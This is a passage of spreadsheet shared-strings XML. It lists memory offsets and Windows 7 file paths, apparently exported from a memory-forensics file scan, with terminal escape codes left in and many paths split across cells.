    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PenIMC_v0400.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece62c8</t>
  </si>
  <si>
    <t>0xdece6380</t>
  </si>
  <si>
    <t>0xdece69c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3031432~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece6ac8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\inetcpl.cpl.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece6be8</t>
  </si>
  <si>
    <t>0xdece6ca0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PenIMC2_v0400.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece6d58</t>
  </si>
  <si>
    <t>0xdece6e10</t>
  </si>
  <si>
    <t>0xdece6ec8</t>
  </si>
  <si>
    <t>0xdece6f80</t>
  </si>
  <si>
    <t>0xdece7500</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msshavmsg.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece7780</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\nsisvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece7910</t>
  </si>
  <si>
    <t>7.1.7601.16</t>
  </si>
  <si>
    <t>398.mu</t>
  </si>
  <si>
    <t>0xdece7d68</t>
  </si>
  <si>
    <t>0xdece7ee8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mshtml.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece8038</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_45_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece80f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_21_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece8290</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netrtx32.inf_x86_neutral_aa92429bfa083dca\netrtx3</t>
  </si>
  <si>
    <t>0xdece83b0</t>
  </si>
  <si>
    <t>0xdece8488</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_7_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece8b80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wlangpui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece9038</t>
  </si>
  <si>
    <t>0xdece95f0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-ca_wallpaper_2a609fdb2b110530.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdece9af8</t>
  </si>
  <si>
    <t>0xdece9ec8</t>
  </si>
  <si>
    <t>~7.1.7601.1</t>
  </si>
  <si>
    <t>6398.m</t>
  </si>
  <si>
    <t>0xdece9f80</t>
  </si>
  <si>
    <t>0xdecea4c0</t>
  </si>
  <si>
    <t>\Windows\System32\wevtsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeceba78</t>
  </si>
  <si>
    <t>\Windows\System32\loadperf.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecec5d0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\imagestore\2c4lnbw\imagestore.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdececec8</t>
  </si>
  <si>
    <t>\Windows\System32\shacct.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdececf80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Accessibility\01fa1db50d3c6520e042_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeced1f0</t>
  </si>
  <si>
    <t>\Winsock2\CatalogChangeListener-308-0_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeced318</t>
  </si>
  <si>
    <t>\System Volume Information\tracking.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeced460</t>
  </si>
  <si>
    <t>\Windows\System32\uxtheme.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecedd38</t>
  </si>
  <si>
    <t>\Windows\System32\propsys.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeceecd8</t>
  </si>
  <si>
    <t>0xdecf0f40</t>
  </si>
  <si>
    <t>\Windows\inf\setupapi.dev.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf1518</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tzres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf17d8</t>
  </si>
  <si>
    <t>\Windows\System32\tzres.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf27d0</t>
  </si>
  <si>
    <t>\eventlog_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf2888</t>
  </si>
  <si>
    <t>0xdecf29f8</t>
  </si>
  <si>
    <t>0xdecf2b40</t>
  </si>
  <si>
    <t>0xdecf3338</t>
  </si>
  <si>
    <t>\Windows\System32\SndVolSSO.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf3c98</t>
  </si>
  <si>
    <t>\Windows\System32\dui70.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf3d80</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf4098</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\authui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf4980</t>
  </si>
  <si>
    <t>\Windows\System32\hid.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf4ca0</t>
  </si>
  <si>
    <t>0xdecf4e10</t>
  </si>
  <si>
    <t>\Users\Wilfred\Favorites_x001B_[0K_x001B_[44G</t>
  </si>
  <si>
    <t>0xdecf5f80</t>
  </si>
  <si>
    <t>0xdecf6840</t>
  </si>
  <si>
    <t>0xdecf7318</t>
  </si>
  <si>
    <t>0xdecf73d0</t>
  </si>
  <si>
    <t>\Windows\System32\MMDevAPI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf7d70</t>
  </si>
  <si>
    <t>0xdecf8330</t>
  </si>
  <si>
    <t>0xdecf87c0</t>
  </si>
  <si>
    <t>0xdecf8f80</t>
  </si>
  <si>
    <t>\Windows\System32\dwmapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecf9b40</t>
  </si>
  <si>
    <t>0xdecfa4d0</t>
  </si>
  <si>
    <t>0xdecfb4d0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\System.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecfc210</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1</t>
  </si>
  <si>
    <t>.ver0x0000000</t>
  </si>
  <si>
    <t>000000001.d</t>
  </si>
  <si>
    <t>b_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecfd358</t>
  </si>
  <si>
    <t>\Windows\System32\imageres.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecfd410</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Security.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecfd578</t>
  </si>
  <si>
    <t>\Windows\System32\audiosrv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecfdbd0</t>
  </si>
  <si>
    <t>0xdecfe268</t>
  </si>
  <si>
    <t>\Windows\inf\netrass.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecfef18</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Application.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecff038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecff0f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Framework.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecff498</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Windows PowerShell.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecff5e8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Internet Explorer.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xdecffbb0</t>
  </si>
  <si>
    <t>\$PrepareToShrinkFileSize_x001B_[0K</t>
  </si>
  <si>
    <t>0xded00528</t>
  </si>
  <si>
    <t>\Windows\inf\netrast.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xded00cd8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Key Management Service.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded01118</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_data_provider_for_sqlserver_0409_22ef188981b08c78.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xded011d0</t>
  </si>
  <si>
    <t>0xded014d8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Media Center.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded01800</t>
  </si>
  <si>
    <t>0xded01f80</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsCodecs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded02830</t>
  </si>
  <si>
    <t>0xded03230</t>
  </si>
  <si>
    <t>\Windows\System32\winbrand.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded04550</t>
  </si>
  <si>
    <t>\Windows\Branding\Basebrd\en-US\basebrd.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded04998</t>
  </si>
  <si>
    <t>0xded04f80</t>
  </si>
  <si>
    <t>\Windows\Branding\Basebrd\basebrd.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded05460</t>
  </si>
  <si>
    <t>\Windows\System32\SmartcardCredentialProvider.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded058f0</t>
  </si>
  <si>
    <t>\Windows\System32\VaultCredProvider.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded05b50</t>
  </si>
  <si>
    <t>\Windows\System32\wkscli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded068b0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded069d0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\HardwareEvents.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded06d00</t>
  </si>
  <si>
    <t>\Windows\System32\profsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded06f80</t>
  </si>
  <si>
    <t>0xded071b8</t>
  </si>
  <si>
    <t>\Windows\System32\BioCredProv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded07740</t>
  </si>
  <si>
    <t>\Users\sshd_server\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer000000000000000</t>
  </si>
  <si>
    <t>00002.regtran</t>
  </si>
  <si>
    <t>s-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded084c0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml_x001B_[0K</t>
  </si>
  <si>
    <t>0xded08960</t>
  </si>
  <si>
    <t>\Windows\System32\vaultcli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded08af8</t>
  </si>
  <si>
    <t>\Windows\System32\credui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded08cd0</t>
  </si>
  <si>
    <t>\Windows\System32\FntCache.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded09038</t>
  </si>
  <si>
    <t>\Windows\System32\netapi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded09940</t>
  </si>
  <si>
    <t>0xded09a20</t>
  </si>
  <si>
    <t>\Windows\System32\mssph.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0a258</t>
  </si>
  <si>
    <t>\Windows\System32\samcli.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0a3c8</t>
  </si>
  <si>
    <t>\Windows\System32\avrt.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0a770</t>
  </si>
  <si>
    <t>0xded0b2a8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6CDA.tmp\System.IdentityModel.Selectors.d</t>
  </si>
  <si>
    <t>0xded0bb68</t>
  </si>
  <si>
    <t>\Windows\System32\adtschema.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0bc20</t>
  </si>
  <si>
    <t>\Windows\System32\winbio.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0bce0</t>
  </si>
  <si>
    <t>0xded0c2b0</t>
  </si>
  <si>
    <t>\Windows\System32\wscsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0cea0</t>
  </si>
  <si>
    <t>0xded0e218</t>
  </si>
  <si>
    <t>\Windows\System32\MRT.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0ea60</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB3184143_RTM~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0eb78</t>
  </si>
  <si>
    <t>0xded0ecd0</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk_x001B_[</t>
  </si>
  <si>
    <t>0xded0ed88</t>
  </si>
  <si>
    <t>\Users\sshd_server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.l</t>
  </si>
  <si>
    <t>0xded0ee80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\AtBroker.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0f278</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Manag</t>
  </si>
  <si>
    <t>ement.Automat</t>
  </si>
  <si>
    <t>0xded0f918</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\pnrpnsp.dll.mui_x001B_[0K_x001B_[131G</t>
  </si>
  <si>
    <t>0xded0fca0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cleanmgr.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0fd58</t>
  </si>
  <si>
    <t>0xded0fe10</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\RAC\StateData\RacMetaData.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded0fec8</t>
  </si>
  <si>
    <t>0xded0ff80</t>
  </si>
  <si>
    <t>0xded10378</t>
  </si>
  <si>
    <t>\Windows\System32\MpSigStub.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded106f8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_59_for_KB2984976~31bf3856ad364e35~x86~~6.1.1.3.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xded10ce8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\mdminst.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded11150</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_performance_winsat_datastore_34fe222e5de27d61.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded11640</t>
  </si>
  <si>
    <t>0xded11ba0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_el-gr_429cd0b684dc71bd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded11f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_characters_8ee06d90f7dead3a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded12038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_en-us_1a0f218933093e9c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded128e0</t>
  </si>
  <si>
    <t>0xded13260</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\acppage.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded134c8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\ui0detect.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded13a40</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\localsec.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded142f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\hpoa1nd.inf_x86_neutral_7b6f40298882eaa3\hpoa1nd.</t>
  </si>
  <si>
    <t>0xded143b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_professionale_d407bf8aae39fb3e.cdf</t>
  </si>
  <si>
    <t>0xded14678</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc003.inf_x86_neutral_e9198ff5f961d947\prnrc00</t>
  </si>
  <si>
    <t>0xded14798</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_homepremium_26b2adbf192ac800.cdf-m</t>
  </si>
  <si>
    <t>0xded14d00</t>
  </si>
  <si>
    <t>0xded15610</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37</t>
  </si>
  <si>
    <t>C951188967C8E</t>
  </si>
  <si>
    <t>B88D99893D9</t>
  </si>
  <si>
    <t>D191FE</t>
  </si>
  <si>
    <t>0xded15b28</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\deskadp.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded15cb8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\amdide.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded16450</t>
  </si>
  <si>
    <t>\Windows\System32\mssprxy.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded16848</t>
  </si>
  <si>
    <t>\Windows\System32\rasplap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded16c20</t>
  </si>
  <si>
    <t>\Windows\System32\mmcss.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded16d88</t>
  </si>
  <si>
    <t>0xded17900</t>
  </si>
  <si>
    <t>\Windows\System32\rasapi32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded17ec8</t>
  </si>
  <si>
    <t>0xded17f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schemas_wcn_b437fb7b7751c8a8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded18210</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-FontFace.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded18988</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imejp10_help_280ffde19e779392.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xded18e50</t>
  </si>
  <si>
    <t>0xded19038</t>
  </si>
  <si>
    <t>\Windows\System32\rasman.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded198c0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded199f8</t>
  </si>
  <si>
    <t>\Windows\System32\rtutils.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded19d98</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1aec8</t>
  </si>
  <si>
    <t>\Windows\System32\microsoft-windows-kernel-power-events.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1b268</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\hotplug.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1bc98</t>
  </si>
  <si>
    <t>\Windows\System32\mspatcha.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1c658</t>
  </si>
  <si>
    <t>0xded1ceb8</t>
  </si>
  <si>
    <t>0xded1d4f8</t>
  </si>
  <si>
    <t>\Windows\setupact.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1d6a0</t>
  </si>
  <si>
    <t>\wave_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1dbd8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1e488</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operatio</t>
  </si>
  <si>
    <t>nal.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1e8c0</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1ef00</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.ev</t>
  </si>
  <si>
    <t>tx_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1f440</t>
  </si>
  <si>
    <t>\Windows\Fonts\StaticCache.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1f9a0</t>
  </si>
  <si>
    <t>\topology_x001B_[0K</t>
  </si>
  <si>
    <t>0xded1fd20</t>
  </si>
  <si>
    <t>\Windows\System32\netprofm.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded202a8</t>
  </si>
  <si>
    <t>\Windows\System32\themeui.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded20360</t>
  </si>
  <si>
    <t>\Windows\ServiceProfiles\LocalService\AppData\Local\~FontCache-System.dat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded208e8</t>
  </si>
  <si>
    <t>\Windows\Fonts_x001B_[0K</t>
  </si>
  <si>
    <t>0xded209a0</t>
  </si>
  <si>
    <t>\Windows\System32\input.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded212c0</t>
  </si>
  <si>
    <t>0xded219a8</t>
  </si>
  <si>
    <t>0xded21d58</t>
  </si>
  <si>
    <t>0xded21f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\input.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded22038</t>
  </si>
  <si>
    <t>0xded22238</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\repdrvfs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded22650</t>
  </si>
  <si>
    <t>\Windows\IME\en-US\SpTip.dll.mui_x001B_[0K_x001B_[52G</t>
  </si>
  <si>
    <t>0xded22ec8</t>
  </si>
  <si>
    <t>0xded22f80</t>
  </si>
  <si>
    <t>\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded231a0</t>
  </si>
  <si>
    <t>0xded232b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\imageres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded23650</t>
  </si>
  <si>
    <t>\Windows\IME\SPTIP.DLL_x001B_[0K</t>
  </si>
  <si>
    <t>0xded23a98</t>
  </si>
  <si>
    <t>\Program Files\Windows NT\TableTextService\TableTextService.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded23cd8</t>
  </si>
  <si>
    <t>\Windows\System32\wdi\{67144949-5132-4859-8036-a737b43825d8}\{f7ddd446-e9cf-43b8-a752-2a46916e</t>
  </si>
  <si>
    <t>8de6}\snapsho</t>
  </si>
  <si>
    <t>t.etl_x001B_[0K</t>
  </si>
  <si>
    <t>0xded23d90</t>
  </si>
  <si>
    <t>0xded24038</t>
  </si>
  <si>
    <t>\Program Files\Windows NT\TableTextService\en-US\TableTextService.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded25398</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE7</t>
  </si>
  <si>
    <t>FFD2FD84D3B32</t>
  </si>
  <si>
    <t>FD43DC8F575</t>
  </si>
  <si>
    <t>A9F28_x001B_</t>
  </si>
  <si>
    <t>0xded25a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Driv</t>
  </si>
  <si>
    <t>ers-Package~3</t>
  </si>
  <si>
    <t>1bf3856ad36</t>
  </si>
  <si>
    <t>4e35~x</t>
  </si>
  <si>
    <t>86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded25e38</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Utilities.v4.0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded25ef0</t>
  </si>
  <si>
    <t>\Windows\System32\urlmon.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded26400</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OfflineFile</t>
  </si>
  <si>
    <t>s-Package~31b</t>
  </si>
  <si>
    <t>f3856ad364e</t>
  </si>
  <si>
    <t>35~x86</t>
  </si>
  <si>
    <t>~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded26890</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Wire</t>
  </si>
  <si>
    <t>d-Network-Dri</t>
  </si>
  <si>
    <t>vers-Packag</t>
  </si>
  <si>
    <t>e~31bf</t>
  </si>
  <si>
    <t>3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded26c38</t>
  </si>
  <si>
    <t>\Windows\System32\audiodg.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xded26f80</t>
  </si>
  <si>
    <t>86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded27100</t>
  </si>
  <si>
    <t>\Windows\System32\ELSCore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xded27450</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2685813~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.1.1</t>
  </si>
  <si>
    <t>1.cat_x001B_</t>
  </si>
  <si>
    <t>0xded27828</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntpe.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded27960</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_163_for_KB4054518~31b</t>
  </si>
  <si>
    <t>~x86~~6.1.1</t>
  </si>
  <si>
    <t>.2.cat</t>
  </si>
  <si>
    <t>0xded27c78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Driv</t>
  </si>
  <si>
    <t>0xded27e30</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\nt5.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xded27ed8</t>
  </si>
  <si>
    <t>0xded28318</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21</t>
  </si>
  <si>
    <t>253908F3CB05D</t>
  </si>
  <si>
    <t>51B1C2DA8B6</t>
  </si>
  <si>
    <t>81A785</t>
  </si>
  <si>
    <t>0xded28660</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\atiilhag.inf_x86_neutral_1d882551ede2c65b\atiilha</t>
  </si>
  <si>
    <t>0xded28af8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\37C</t>
  </si>
  <si>
    <t>951188967C8EB</t>
  </si>
  <si>
    <t>88D99893D9D</t>
  </si>
  <si>
    <t>191FE_x001B_</t>
  </si>
  <si>
    <t>0xded28da8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\charmap.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xded29398</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData_x001B_[0</t>
  </si>
  <si>
    <t>0xded29580</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\212</t>
  </si>
  <si>
    <t>53908F3CB05D5</t>
  </si>
  <si>
    <t>1B1C2DA8B68</t>
  </si>
  <si>
    <t>1A785_x001B_</t>
  </si>
  <si>
    <t>0xded29860</t>
  </si>
  <si>
